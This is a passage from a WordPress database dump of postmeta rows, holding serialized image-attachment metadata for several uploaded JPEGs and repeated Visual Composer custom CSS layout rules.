:4:\"file\";s:19:\"main_u3-800x400.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52446;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:20:\"main_u3-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103253;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35519,5151,'_wp_attached_file','2023/08/main_u5.jpg'),
(35520,5151,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:19:\"2023/08/main_u5.jpg\";s:8:\"filesize\";i:356385;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"main_u5-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7152;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"main_u5-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44974;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"main_u5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6112;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"main_u5-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29536;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"main_u5-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15702;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:19:\"main_u5-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31210;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:20:\"main_u5-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63146;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35521,5152,'_wp_attached_file','2023/08/main_u5-1.jpg'),
(35522,5152,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:21:\"2023/08/main_u5-1.jpg\";s:8:\"filesize\";i:355287;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"main_u5-1-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7000;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"main_u5-1-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44728;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"main_u5-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6741;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"main_u5-1-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29034;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"main_u5-1-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15603;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"main_u5-1-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31374;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:22:\"main_u5-1-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62398;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35523,5153,'_wp_attached_file','2023/08/main_u5-2.jpg'),
(35524,5153,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:21:\"2023/08/main_u5-2.jpg\";s:8:\"filesize\";i:337543;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"main_u5-2-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6431;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"main_u5-2-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42298;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"main_u5-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6170;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"main_u5-2-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27228;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"main_u5-2-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14369;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"main_u5-2-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29443;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:22:\"main_u5-2-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58553;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35525,5154,'_wp_attached_file','2023/08/main_u5-3.jpg'),
(35526,5154,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:21:\"2023/08/main_u5-3.jpg\";s:8:\"filesize\";i:346192;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"main_u5-3-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6679;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"main_u5-3-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43347;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"main_u5-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6175;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"main_u5-3-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27698;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"main_u5-3-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14784;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"main_u5-3-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29762;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:22:\"main_u5-3-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59757;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35527,5155,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 115px !important;}.vc_custom_1689081933017{margin-top: 145px !important;}.vc_custom_1689081968974{margin-top: 160px !important;}.vc_custom_1689081968955{margin-top: 115px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35528,5155,'_wpb_shortcodes_custom_css_updated','1'),
(35529,5156,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 115px !important;}.vc_custom_1689081933017{margin-top: 145px !important;}.vc_custom_1689081968974{margin-top: 160px !important;}.vc_custom_1689081968955{margin-top: 115px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35530,5156,'_wpb_shortcodes_custom_css_updated','1'),
(35532,5157,'_wp_attached_file','2023/08/main_u5-4.jpg'),
(35533,5157,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:21:\"2023/08/main_u5-4.jpg\";s:8:\"filesize\";i:360715;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"main_u5-4-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6697;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"main_u5-4-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45524;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"main_u5-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6085;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"main_u5-4-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29122;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"main_u5-4-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15286;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"main_u5-4-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31113;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:22:\"main_u5-4-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63785;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35534,5159,'_wp_attached_file','2023/08/dr-radwa.jpg'),
(35535,5159,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:585;s:6:\"height\";i:658;s:4:\"file\";s:20:\"2023/08/dr-radwa.jpg\";s:8:\"filesize\";i:56190;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"dr-radwa-267x300.jpg\";s:5:\"width\";i:267;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19695;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"dr-radwa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7097;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:20:\"dr-radwa-500x562.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:562;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51426;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(35536,5160,'_wp_attached_file','2023/08/zaki.jpg'),
(35537,5160,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:723;s:6:\"height\";i:1024;s:4:\"file\";s:16:\"2023/08/zaki.jpg\";s:8:\"filesize\";i:46106;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"zaki-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8866;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"zaki-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4350;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"zaki-500x708.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:708;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31786;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(35538,5161,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(35539,5161,'_wpb_shortcodes_custom_css_updated','1'),
(35540,4849,'_wpb_shortcodes_custom_css_updated','1'),
(35541,5162,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 